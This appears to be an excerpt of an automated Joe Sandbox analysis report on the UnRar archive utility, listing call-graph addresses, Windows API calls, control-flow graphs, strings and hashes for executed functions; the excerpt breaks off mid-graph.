30061->30062 30062->30045 30326 7ff7aacf0da0 RtlPcToFileHeader RaiseException Concurrency::cancel_current_task _com_error::_com_error 30351 7ff7aace4e9c 34 API calls _invalid_parameter_noinfo_noreturn 30352 7ff7aacb9a9c 37 API calls swprintf 29993 7ff7aacdd6d4 79 API calls 3 library calls 30029 7ff7aacf70d4 30036 7ff7aacfaaf8 30029->30036 30031 7ff7aacf70d9 30032 7ff7aacfc788 fflush LeaveCriticalSection 30031->30032 30033 7ff7aacf70e4 30032->30033 30034 7ff7aacf70f0 30033->30034 30035 7ff7aacf710c 11 API calls 30033->30035 30035->30034 30041 7ff7aacfc240 35 API calls 2 library calls 30036->30041 30039 7ff7aacfab03 30042 7ff7aacfbdfc 35 API calls abort 30039->30042 30041->30039 30280 7ff7aacfbbc0 GetCommandLineA GetCommandLineW 30354 7ff7aacfe6b8 35 API calls 2 library calls 30012 7ff7aacfd274 30013 7ff7aacfd2bf 30012->30013 30017 7ff7aacfd283 abort 30012->30017 30022 7ff7aacfc49c 15 API calls setbuf 30013->30022 30015 7ff7aacfd2a6 HeapAlloc 30016 7ff7aacfd2bd 30015->30016 30015->30017 30017->30013 30017->30015 30019 7ff7aacfab28 30017->30019 30023 7ff7aacfab68 30019->30023 30022->30016 30028 7ff7aacfc728 EnterCriticalSection 30023->30028 30025 7ff7aacfab75 30026 7ff7aacfc788 fflush LeaveCriticalSection 30025->30026 30027 7ff7aacfab3a 30026->30027 30027->30017 30330 7ff7aacbcd70 CharUpperW 30305 7ff7aacf1870 59 API calls _RTC_Initialize 30355 7ff7aacbce68 18 API calls 30356 7ff7aacf2268 35 API calls __GSHandlerCheck_EH 30063 7ff7aacf195c 30084 7ff7aacf13ec 30063->30084 30066 7ff7aacf1ab3 30144 7ff7aacf1d78 7 API calls 2 library calls 30066->30144 30067 7ff7aacf197d __scrt_acquire_startup_lock 30069 7ff7aacf1abd 30067->30069 30075 7ff7aacf199b __scrt_release_startup_lock 30067->30075 30145 7ff7aacf1d78 7 API calls 2 library calls 30069->30145 30071 7ff7aacf19c0 30072 7ff7aacf1ac8 abort 30073 7ff7aacf1a46 30092 7ff7aacfb404 30073->30092 30075->30071 30075->30073 30141 7ff7aacf71f8 35 API calls __GSHandlerCheck_EH 30075->30141 30076 7ff7aacf1a4b 30096 7ff7aacd4b9c 30076->30096 30081 7ff7aacf1a6f 30081->30072 30143 7ff7aacf1580 7 API calls __scrt_initialize_crt 30081->30143 30083 7ff7aacf1a86 30083->30071 30146 7ff7aacf1bb0 30084->30146 30087 7ff7aacf141b 30148 7ff7aacfba20 30087->30148 30088 7ff7aacf1417 30088->30066 30088->30067 30093 7ff7aacfb414 30092->30093 30095 7ff7aacfb419 30092->30095 30226 7ff7aacfb0c4 54 API calls 30093->30226 30095->30076 30227 7ff7aace2648 GetModuleHandleW 30096->30227 30102 7ff7aacd4bd9 SetErrorMode GetModuleHandleW 30103 7ff7aacdb230 51 API calls 30102->30103 30104 7ff7aacd4bfb 30103->30104 30105 7ff7aacb33a4 33 API calls 30104->30105 30106 7ff7aacd4c21 30105->30106 30107 7ff7aacda054 100 API calls 30106->30107 30108 7ff7aacd4c33 30107->30108 30109 7ff7aacd4c71 30108->30109 30111 7ff7aacd4d9f 30108->30111 30110 7ff7aacf0e98 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 30109->30110 30112 7ff7aacd4c85 30110->30112 30113 7ff7aacf6404 _invalid_parameter_noinfo_noreturn 31 API calls 30111->30113 30114 7ff7aacd4c97 30112->30114 30116 7ff7aacb91d4 35 API calls 30112->30116 30115 7ff7aacd4da4 30113->30115 30117 7ff7aacba6e4 35 API calls 30114->30117 30116->30114 30119 7ff7aacd4cb3 30117->30119 30118 7ff7aacd4cc9 30121 7ff7aacba6e4 35 API calls 30118->30121 30119->30118 30120 7ff7aacbca28 113 API calls 30119->30120 30122 7ff7aacd4cc1 30120->30122 30123 7ff7aacd4cd9 30121->30123 30124 7ff7aacba8bc 52 API calls 30122->30124 30125 7ff7aacd4ce7 30123->30125 30127 7ff7aacd4cee 30123->30127 30124->30118 30126 7ff7aace280c CreateEventW CloseHandle CreateEventW GetLastError CloseHandle 30125->30126 30126->30127 30128 7ff7aacb9fec 53 API calls 30127->30128 30129 7ff7aacd4d28 30128->30129 30130 7ff7aacbaaf8 252 API calls 30129->30130 30131 7ff7aacd4d30 30130->30131 30132 7ff7aacb1c48 69 API calls 30131->30132 30133 7ff7aacd4d39 30132->30133 30134 7ff7aacd4d6c 30133->30134 30135 7ff7aacd4d5a 30133->30135 30138 7ff7aacf1050 _handle_error 8 API calls 30134->30138 30136 7ff7aace280c CreateEventW CloseHandle CreateEventW GetLastError CloseHandle 30135->30136 30137 7ff7aacd4d61 30136->30137 30137->30134 30140 7ff7aace2740 14 API calls 30137->30140 30139 7ff7aacd4d8b 30138->30139 30142 7ff7aacf1ecc GetModuleHandleW 30139->30142 30140->30134 30141->30073 30142->30081 30143->30083 30144->30069 30145->30072 30147 7ff7aacf140e __scrt_dllmain_crt_thread_attach 30146->30147 30147->30087 30147->30088 30149 7ff7aad00cbc 30148->30149 30150 7ff7aacf1420 30149->30150 30154 7ff7aacfc380 30149->30154 30161 7ff7aacfe440 30149->30161 30150->30088 30153 7ff7aacf3ca0 7 API calls 2 library calls 30150->30153 30153->30088 30172 7ff7aacfca34 30154->30172 30159 7ff7aacfc39b 30159->30149 30225 7ff7aacfc728 EnterCriticalSection 30161->30225 30163 7ff7aacfe450 30164 7ff7aacff374 32 API calls 30163->30164 30165 7ff7aacfe459 30164->30165 30166 7ff7aacfe250 34 API calls 30165->30166 30171 7ff7aacfe467 30165->30171 30168 7ff7aacfe462 30166->30168 30167 7ff7aacfc788 fflush LeaveCriticalSection 30169 7ff7aacfe473 30167->30169 30170 7ff7aacfe33c GetStdHandle GetFileType 30168->30170 30169->30149 30170->30171 30171->30167 30197 7ff7aacfc7a4 30172->30197 30175 7ff7aacfca78 TlsAlloc 30176 7ff7aacfc390 30175->30176 30176->30159 30177 7ff7aacfc2d4 GetLastError 30176->30177 30178 7ff7aacfc2fd 30177->30178 30179 7ff7aacfc2f8 30177->30179 30183 7ff7aacfc346 30178->30183 30207 7ff7aacfe4c0 30178->30207 30214 7ff7aacfcae4 6 API calls __vcrt_uninitialize_ptd 30179->30214 30185 7ff7aacfc355 SetLastError 30183->30185 30186 7ff7aacfc34b SetLastError 30183->30186 30184 7ff7aacfc31c 30215 7ff7aacfd234 30184->30215 30188 7ff7aacfc360 30185->30188 30186->30188 30188->30159 30196 7ff7aacfc3c0 6 API calls __vcrt_uninitialize_ptd 30188->30196 30190 7ff7aacfc333 30190->30184 30192 7ff7aacfc33a 30190->30192 30191 7ff7aacfc323 30191->30186 30222 7ff7aacfbfe4 15 API calls abort 30192->30222 30194 7ff7aacfc33f 30195 7ff7aacfd234 __free_lconv_num 12 API calls 30194->30195 30195->30183 30196->30159 30201 7ff7aacfc805 30197->30201 30202 7ff7aacfc800 30197->30202 30198 7ff7aacfc8b2 30200 7ff7aacfc8c0 GetProcAddress 30198->30200 30198->30201 30199 7ff7aacfc82d LoadLibraryExW 30199->30202 30203 7ff7aacfc84e GetLastError 30199->30203 30204 7ff7aacfc8d1 30200->30204 30201->30175 30201->30176 30202->30198 30202->30199 30202->30201 30206 7ff7aacfc897 FreeLibrary 30202->30206 30203->30202 30205 7ff7aacfc859 LoadLibraryExW 30203->30205 30204->30201 30205->30202 30206->30202 30210 7ff7aacfe4d1 abort 30207->30210 30208 7ff7aacfe522 30223 7ff7aacfc49c 15 API calls setbuf 30208->30223 30209 7ff7aacfe506 HeapAlloc 30209->30210 30211 7ff7aacfc314 30209->30211 30210->30208 30210->30209 30213 7ff7aacfab28 abort 2 API calls 30210->30213 30211->30184 30221 7ff7aacfcb3c 6 API calls __vcrt_uninitialize_ptd 30211->30221 30213->30210 30214->30178 30216 7ff7aacfd239 RtlFreeHeap 30215->30216 30220 7ff7aacfd269 __free_lconv_num 30215->30220 30217 7ff7aacfd254 30216->30217 30216->30220 30224 7ff7aacfc49c 15 API calls setbuf 30217->30224 30219 7ff7aacfd259 GetLastError 30219->30220 30220->30191 30221->30190 30222->30194 30223->30211 30224->30219 30226->30095 30228 7ff7aacd4bc6 30227->30228 30229 7ff7aace266a GetProcAddress 30227->30229 30232 7ff7aacbdb60 30228->30232 30230 7ff7aace2695 GetProcAddress 30229->30230 30231 7ff7aace267f 30229->30231 30230->30228 30231->30230 30233 7ff7aacbdb6e 30232->30233 30253 7ff7aacf9ce4 30233->30253 30235 7ff7aacbdb78 30236 7ff7aacf9ce4 setbuf 60 API calls 30235->30236 30237 7ff7aacbdb8c 30236->30237 30262 7ff7aacbdc10 GetStdHandle GetFileType 30237->30262 30240 7ff7aacbdc10 3 API calls 30241 7ff7aacbdba6 30240->30241 30242 7ff7aacbdc10 3 API calls 30241->30242 30245 7ff7aacbdbb6 30242->30245 30243 7ff7aacbdbe3 30244 7ff7aacbdc0a 30243->30244 30267 7ff7aacf9cbc 31 API calls 2 library calls 30243->30267 30252 7ff7aacc1014 SetConsoleCtrlHandler 30244->30252 30245->30243 30265 7ff7aacf9cbc 31 API calls 2 library calls 30245->30265 30247 7ff7aacbdbd7 30266 7ff7aacf9d40 33 API calls 2 library calls 30247->30266 30250 7ff7aacbdbfe 30268 7ff7aacf9d40 33 API calls 2 library calls 30250->30268 30254 7ff7aacf9ce9 30253->30254 30255 7ff7aacff20c 30254->30255 30258 7ff7aacff247 30254->30258 30269 7ff7aacfc49c 15 API calls setbuf 30255->30269 30257 7ff7aacff211 30270 7ff7aacf63e4 31 API calls _invalid_parameter_noinfo 30257->30270 30271 7ff7aacff0bc 60 API calls 2 library calls 30258->30271 30261 7ff7aacff21c 30261->30235 30263 7ff7aacbdc2d GetConsoleMode 30262->30263 30264 7ff7aacbdb96 30262->30264 30263->30264 30264->30240 30265->30247 30266->30243 30267->30250 30268->30244 30269->30257 30270->30261 30271->30261 30307 7ff7aacb945c 50 API calls 30283 7ff7aacf0f58 48 API calls 2 library calls 30284 7ff7aad06f96 LeaveCriticalSection fflush 30308 7ff7aacb1090 10 API calls _handle_error 30285 7ff7aacf0b8f MultiByteToWideChar SysAllocString GetLastError GetLastError 30309 7ff7aad00c90 GetProcessHeap 30334 7ff7aacb1988 31 API calls std::_Xinvalid_argument 30358 7ff7aacf1a8a GetModuleHandleW abort 30311 7ff7aacbe880 33 API calls 30359 7ff7aacb3e80 72 API calls _handle_error 30312 7ff7aacfe480 16 API calls 30313 7ff7aacc287c 189 API calls 3 library calls 30314 7ff7aacf3c78 10 API calls 2 library calls 30287 7ff7aacf1f30 44 API calls __GSHandlerCheck_EH 30315 7ff7aacb1020 34 API calls 30336 7ff7aace2d20 67 API calls 30290 7ff7aacf9f20 QueryPerformanceFrequency QueryPerformanceCounter 30363 7ff7aad04220 48 API calls 30316 7ff7aad0441b 24 API calls _log10_special 30317 7ff7aacd9c50 8 API calls _handle_error 30364 7ff7aacf9a50 64 API calls 2 library calls 30337 7ff7aacd4d49 19 API calls _handle_error 30367 7ff7aacff644 36 API calls 4 library calls 30368 7ff7aacfce40 FreeLibrary 30340 7ff7aacee940 188 API calls 30341 7ff7aacf1940 32 API calls 2 library calls

                                                            Executed Functions

                                                            Function 00007FF7AACDAFB4 Relevance: 23.0, APIs: 9, Strings: 4, Instructions: 252registrylibraryCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 357 7ff7aacdafb4-7ff7aacdafdf 358 7ff7aacdafe1-7ff7aacdafe9 357->358 359 7ff7aacdaffa-7ff7aacdb010 call 7ff7aacf397c 357->359 360 7ff7aacdafeb 358->360 361 7ff7aacdafee-7ff7aacdaff5 call 7ff7aacb32dc 358->361 365 7ff7aacdb204-7ff7aacdb222 call 7ff7aacf1050 359->365 366 7ff7aacdb016-7ff7aacdb03c RegOpenKeyExW 359->366 360->361 361->359 366->365 368 7ff7aacdb042-7ff7aacdb069 RegQueryValueExW 366->368 370 7ff7aacdb06f-7ff7aacdb0cd call 7ff7aacbd23c RegQueryValueExW 368->370 371 7ff7aacdb1fa-7ff7aacdb1fe RegCloseKey 368->371 374 7ff7aacdb0d3-7ff7aacdb0df 370->374 375 7ff7aacdb1be-7ff7aacdb1c5 370->375 371->365 377 7ff7aacdb0e1-7ff7aacdb0e9 374->377 378 7ff7aacdb0eb-7ff7aacdb0f3 call 7ff7aacdae64 374->378 375->371 376 7ff7aacdb1c7-7ff7aacdb1de 375->376 381 7ff7aacdb1f5 call 7ff7aacf0ed4 376->381 382 7ff7aacdb1e0-7ff7aacdb1f3 376->382 379 7ff7aacdb0f8-7ff7aacdb108 377->379 378->379 383 7ff7aacdb10c-7ff7aacdb114 379->383 381->371 382->381 384 7ff7aacdb223-7ff7aacdb228 call 7ff7aacf6404 382->384 383->383 386 7ff7aacdb116-7ff7aacdb15b call 7ff7aacb33a4 call 7ff7aace14a4 call 7ff7aacd3990 call 7ff7aacd2edc call 7ff7aacb3250 call 7ff7aaccb134 383->386 391 7ff7aacdb229-7ff7aacdb2a9 call 7ff7aacf6404 call 7ff7aacdb46c call 7ff7aacb33a4 call 7ff7aacd21f8 384->391 414 7ff7aacdb181-7ff7aacdb189 386->414 415 7ff7aacdb15d-7ff7aacdb164 386->415 411 7ff7aacdb2e2-7ff7aacdb322 call 7ff7aacdafb4 GetVersionExW 391->411 412 7ff7aacdb2ab-7ff7aacdb2c2 391->412 423 7ff7aacdb324-7ff7aacdb329 411->423 424 7ff7aacdb331-7ff7aacdb379 LoadLibraryExW call 7ff7aacb3250 411->424 416 7ff7aacdb2c4-7ff7aacdb2d7 412->416 417 7ff7aacdb2dd call 7ff7aacf0ed4 412->417 414->375 420 7ff7aacdb18b-7ff7aacdb1a1 414->420 415->414 419 7ff7aacdb166-7ff7aacdb180 call 7ff7aacb32dc 415->419 416->417 421 7ff7aacdb3a6-7ff7aacdb3ab call 7ff7aacf6404 416->421 417->411 419->414 426 7ff7aacdb1a3-7ff7aacdb1b6 420->426 427 7ff7aacdb1b8-7ff7aacdb1bd call 7ff7aacf0ed4 420->427 423->424 429 7ff7aacdb32b 423->429 434 7ff7aacdb37e-7ff7aacdb3a5 call 7ff7aacf1050 424->434 426->391 426->427 427->375 429->424
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2303579813.00007FF7AACB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AACB0000, based on PE: true
                                                            • Associated: 00000005.00000002.2303553417.00007FF7AACB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303651093.00007FF7AAD08000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303833006.00007FF7AAD1C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD1E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD26000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2304076621.00007FF7AAD2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_7ff7aacb0000_UnRar.jbxd
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo_noreturn$LibraryQueryValue$CloseFreeLoadOpenVersion
                                                            • String ID: LanguageFolder$LanguageFolder$Software\WinRAR\General$rarlng.dll
                                                            • API String ID: 1380314429-3582364644
                                                            • Opcode ID: 0bf37d04180593c3d6e5092dbfd08b06593bdd7d5482d25904280f249be3a38c
                                                            • Instruction ID: 0622a125725848cb09c14bb3a2b9aca846f48f8d888df2ced59808bd04bbb641
                                                            • Opcode Fuzzy Hash: 0bf37d04180593c3d6e5092dbfd08b06593bdd7d5482d25904280f249be3a38c
                                                            • Instruction Fuzzy Hash: 2DB1BE72B1AB42D5FB10EB64E4402ADA371FB88794F814271DAAD13BA9DF3CD546C320
                                                            Function 00007FF7AACC6BDC Relevance: 22.7, APIs: 8, Strings: 4, Instructions: 1693COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2303579813.00007FF7AACB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AACB0000, based on PE: true
                                                            • Associated: 00000005.00000002.2303553417.00007FF7AACB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303651093.00007FF7AAD08000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303833006.00007FF7AAD1C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD1E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD26000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2304076621.00007FF7AAD2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_7ff7aacb0000_UnRar.jbxd
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo_noreturn
                                                            • String ID: $ ?$%s%s $__tmp_reference_source_
                                                            • API String ID: 3668304517-1166188083
                                                            • Opcode ID: 205332c28092721b86b23933287b31ef747976190ec2fe010b294d20baa25b80
                                                            • Instruction ID: d5ec680e3389cf51a94422aa4b3b91b4f67aa777d6cf0993c6d9dc5c52f2ee09
                                                            • Opcode Fuzzy Hash: 205332c28092721b86b23933287b31ef747976190ec2fe010b294d20baa25b80
                                                            • Instruction Fuzzy Hash: 00F2C062A0E6C2D2FA64AB25E0503BEE3A1FB81740F856176DB9D036B5DF3CE546C710
                                                            Function 00007FF7AACDD6D4 Relevance: 20.3, APIs: 10, Strings: 1, Instructions: 1084COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2303579813.00007FF7AACB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AACB0000, based on PE: true
                                                            • Associated: 00000005.00000002.2303553417.00007FF7AACB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303651093.00007FF7AAD08000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303833006.00007FF7AAD1C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD1E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD26000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2304076621.00007FF7AAD2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_7ff7aacb0000_UnRar.jbxd
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo_noreturn$CloseFind
                                                            • String ID: *.*
                                                            • API String ID: 3587649625-438819550
                                                            • Opcode ID: cd05ba69ad9439e6ec5d35c7ae920358a983ca4b841f24ca449d9dd507d884b0
                                                            • Instruction ID: b1048f9362fad93eed10a325e9e8637eba7fca9bc3c0a0e1872293cdcfca99cc
                                                            • Opcode Fuzzy Hash: cd05ba69ad9439e6ec5d35c7ae920358a983ca4b841f24ca449d9dd507d884b0
                                                            • Instruction Fuzzy Hash: 08A2E262F0BB82C5FF10EB64D0442BDA361EB44798F825676DA5D17BA9DF38E446C320
                                                            Function 00007FF7AACC5C50 Relevance: 19.9, APIs: 9, Strings: 2, Instructions: 661COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2303579813.00007FF7AACB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AACB0000, based on PE: true
                                                            • Associated: 00000005.00000002.2303553417.00007FF7AACB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303651093.00007FF7AAD08000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303833006.00007FF7AAD1C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD1E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD26000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2304076621.00007FF7AAD2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_7ff7aacb0000_UnRar.jbxd
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo_noreturn
                                                            • String ID: rar$rev
                                                            • API String ID: 3668304517-2145959568
                                                            • Opcode ID: 0654d4b8c0aff28aabc50a8ba345123ad3a013a58d85fcfceec7a5f712ff08e9
                                                            • Instruction ID: 1e0b3a6ab1d1e424c1dbc1e142ad5c84360db1d7487475e364cd35be1a5259f9
                                                            • Opcode Fuzzy Hash: 0654d4b8c0aff28aabc50a8ba345123ad3a013a58d85fcfceec7a5f712ff08e9
                                                            • Instruction Fuzzy Hash: 3652E262B0A742C0FA10EF64D5442BDE361EB84798F826275DA5D17ABADF3CE587C310
                                                            Function 00007FF7AACC63AC Relevance: 12.7, APIs: 6, Strings: 1, Instructions: 429COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 2416 7ff7aacc63ac-7ff7aacc6406 call 7ff7aacf0ff0 call 7ff7aacb1734 2421 7ff7aacc641f-7ff7aacc6425 2416->2421 2422 7ff7aacc6408-7ff7aacc641d 2416->2422 2424 7ff7aacc6451-7ff7aacc645f call 7ff7aacca808 2421->2424 2425 7ff7aacc6427-7ff7aacc6432 2421->2425 2423 7ff7aacc646c-7ff7aacc6479 call 7ff7aacb2880 2422->2423 2436 7ff7aacc647f-7ff7aacc64c3 call 7ff7aacb33a4 call 7ff7aacd062c 2423->2436 2437 7ff7aacc6684-7ff7aacc668a 2423->2437 2432 7ff7aacc6464-7ff7aacc6466 2424->2432 2428 7ff7aacc6434 2425->2428 2429 7ff7aacc6437-7ff7aacc643b 2425->2429 2428->2429 2430 7ff7aacc6445-7ff7aacc644c call 7ff7aaccbdd4 2429->2430 2431 7ff7aacc643d-7ff7aacc6443 2429->2431 2430->2424 2431->2424 2431->2430 2432->2423 2435 7ff7aacc6aeb-7ff7aacc6aef call 7ff7aacb1b10 2432->2435 2441 7ff7aacc6af4-7ff7aacc6b20 call 7ff7aacf1050 2435->2441 2456 7ff7aacc64c5-7ff7aacc64d8 2436->2456 2457 7ff7aacc64f8-7ff7aacc64fb 2436->2457 2437->2435 2439 7ff7aacc6690-7ff7aacc669c 2437->2439 2442 7ff7aacc66a2-7ff7aacc66a8 2439->2442 2443 7ff7aacc67be-7ff7aacc67cd call 7ff7aacb3094 2439->2443 2442->2443 2447 7ff7aacc66ae-7ff7aacc66b4 2442->2447 2453 7ff7aacc67cf-7ff7aacc67da 2443->2453 2454 7ff7aacc67fa-7ff7aacc6800 2443->2454 2447->2443 2451 7ff7aacc66ba-7ff7aacc66fd call 7ff7aacd3d3c 2447->2451 2474 7ff7aacc6702-7ff7aacc6709 call 7ff7aace53b4 2451->2474 2475 7ff7aacc66ff 2451->2475 2453->2454 2460 7ff7aacc67dc-7ff7aacc67f6 call 7ff7aacc4908 2453->2460 2461 7ff7aacc69c1-7ff7aacc69df call 7ff7aacc6b48 2454->2461 2462 7ff7aacc6806-7ff7aacc680a 2454->2462 2464 7ff7aacc64f3 call 7ff7aacf0ed4 2456->2464 2465 7ff7aacc64da-7ff7aacc64ed 2456->2465 2458 7ff7aacc65d1-7ff7aacc65d8 2457->2458 2459 7ff7aacc6501-7ff7aacc6540 call 7ff7aacd3d3c 2457->2459 2470 7ff7aacc65da 2458->2470 2471 7ff7aacc65dd-7ff7aacc6630 call 7ff7aacdb3ac call 7ff7aacbe42c call 7ff7aacb33a4 call 7ff7aacd062c 2458->2471 2492 7ff7aacc6542 2459->2492 2493 7ff7aacc6545-7ff7aacc654c call 7ff7aace53b4 2459->2493 2460->2454 2488 7ff7aacc69e1 2461->2488 2489 7ff7aacc69e4-7ff7aacc69e8 2461->2489 2472 7ff7aacc684a-7ff7aacc68ab call 7ff7aacb8de0 call 7ff7aacd34ec 2462->2472 2473 7ff7aacc680c-7ff7aacc6813 2462->2473 2464->2457 2465->2464 2466 7ff7aacc6b2d-7ff7aacc6b32 call 7ff7aacf6404 2465->2466 2499 7ff7aacc6b33-7ff7aacc6b38 call 7ff7aacf6404 2466->2499 2470->2471 2555 7ff7aacc6632-7ff7aacc6645 2471->2555 2556 7ff7aacc6665-7ff7aacc6668 2471->2556 2524 7ff7aacc6926-7ff7aacc693a call 7ff7aaccccf0 2472->2524 2483 7ff7aacc6815-7ff7aacc681c 2473->2483 2484 7ff7aacc682d-7ff7aacc6835 2473->2484 2500 7ff7aacc6781-7ff7aacc6789 2474->2500 2501 7ff7aacc670b-7ff7aacc6717 call 7ff7aaccb134 2474->2501 2475->2474 2496 7ff7aacc6821-7ff7aacc6828 call 7ff7aacb32dc 2483->2496 2497 7ff7aacc681e 2483->2497 2490 7ff7aacc683a-7ff7aacc6845 2484->2490 2491 7ff7aacc6837 2484->2491 2488->2489 2502 7ff7aacc69ea-7ff7aacc69ee 2489->2502 2503 7ff7aacc69f9 2489->2503 2504 7ff7aacc6ac3-7ff7aacc6ac8 2490->2504 2491->2490 2492->2493 2525 7ff7aacc6578-7ff7aacc6586 call 7ff7aacd6d34 2493->2525 2526 7ff7aacc654e-7ff7aacc655a call 7ff7aaccb134 2493->2526 2496->2484 2497->2496 2527 7ff7aacc6b39-7ff7aacc6b3e call 7ff7aacf6404 2499->2527 2500->2443 2516 7ff7aacc678b-7ff7aacc679e 2500->2516 2501->2500 2532 7ff7aacc6719-7ff7aacc6733 call 7ff7aace2150 2501->2532 2511 7ff7aacc69f0 2502->2511 2512 7ff7aacc69f3-7ff7aacc69f7 2502->2512 2513 7ff7aacc6a00-7ff7aacc6a0f 2503->2513 2504->2435 2511->2512 2512->2503 2512->2513 2522 7ff7aacc6a11 2513->2522 2523 7ff7aacc6a14-7ff7aacc6a18 2513->2523 2517 7ff7aacc67a0-7ff7aacc67b3 2516->2517 2518 7ff7aacc67b9 call 7ff7aacf0ed4 2516->2518 2517->2518 2517->2527 2518->2443 2522->2523 2533 7ff7aacc6a20-7ff7aacc6a2c call 7ff7aace47f0 2523->2533 2534 7ff7aacc6a1a-7ff7aacc6a1e 2523->2534 2546 7ff7aacc6940-7ff7aacc6948 2524->2546 2547 7ff7aacc68ad-7ff7aacc68ba 2524->2547 2544 7ff7aacc658c-7ff7aacc6594 2525->2544 2526->2525 2550 7ff7aacc655c-7ff7aacc6576 call 7ff7aace2150 2526->2550 2559 7ff7aacc6b3f-7ff7aacc6b47 call 7ff7aacf6404 2527->2559 2532->2500 2560 7ff7aacc6735-7ff7aacc673d 2532->2560 2541 7ff7aacc6a31-7ff7aacc6a38 2533->2541 2534->2541 2551 7ff7aacc6a4a-7ff7aacc6a66 call 7ff7aacb6968 call 7ff7aacc6bdc 2541->2551 2552 7ff7aacc6a3a-7ff7aacc6a46 call 7ff7aacb3000 2541->2552 2544->2435 2554 7ff7aacc659a-7ff7aacc65ad 2544->2554 2557 7ff7aacc694a-7ff7aacc695d 2546->2557 2558 7ff7aacc697d-7ff7aacc698c 2546->2558 2561 7ff7aacc68ef-7ff7aacc6922 call 7ff7aacd34ec 2547->2561 2562 7ff7aacc68bc-7ff7aacc68cf 2547->2562 2550->2525 2550->2544 2596 7ff7aacc6a6b-7ff7aacc6a6d 2551->2596 2552->2551 2567 7ff7aacc65b3-7ff7aacc65c6 2554->2567 2568 7ff7aacc6777-7ff7aacc677c call 7ff7aacf0ed4 2554->2568 2569 7ff7aacc6660 call 7ff7aacf0ed4 2555->2569 2570 7ff7aacc6647-7ff7aacc665a 2555->2570 2556->2435 2575 7ff7aacc666e-7ff7aacc667f call 7ff7aacc0fd0 2556->2575 2571 7ff7aacc695f-7ff7aacc6972 2557->2571 2572 7ff7aacc6978 call 7ff7aacf0ed4 2557->2572 2558->2461 2576 7ff7aacc698e-7ff7aacc69a1 2558->2576 2560->2435 2574 7ff7aacc6743-7ff7aacc675c 2560->2574 2561->2524 2577 7ff7aacc68d1-7ff7aacc68e4 2562->2577 2578 7ff7aacc68ea call 7ff7aacf0ed4 2562->2578 2586 7ff7aacc6b27-7ff7aacc6b2c call 7ff7aacf6404 2567->2586 2587 7ff7aacc65cc 2567->2587 2568->2435 2569->2556 2570->2499 2570->2569 2571->2559 2571->2572 2572->2558 2574->2568 2581 7ff7aacc675e-7ff7aacc6771 2574->2581 2575->2435 2575->2568 2592 7ff7aacc69a3-7ff7aacc69b6 2576->2592 2593 7ff7aacc69bc call 7ff7aacf0ed4 2576->2593 2577->2559 2577->2578 2578->2561 2581->2527 2581->2568 2586->2466 2587->2568 2592->2593 2598 7ff7aacc6b21-7ff7aacc6b26 call 7ff7aacf6404 2592->2598 2593->2461 2596->2551 2602 7ff7aacc6a6f-7ff7aacc6a73 2596->2602 2598->2586 2604 7ff7aacc6a75-7ff7aacc6aab call 7ff7aaccccf0 2602->2604 2605 7ff7aacc6aca-7ff7aacc6ad4 2602->2605 2611 7ff7aacc6ab9-7ff7aacc6abe call 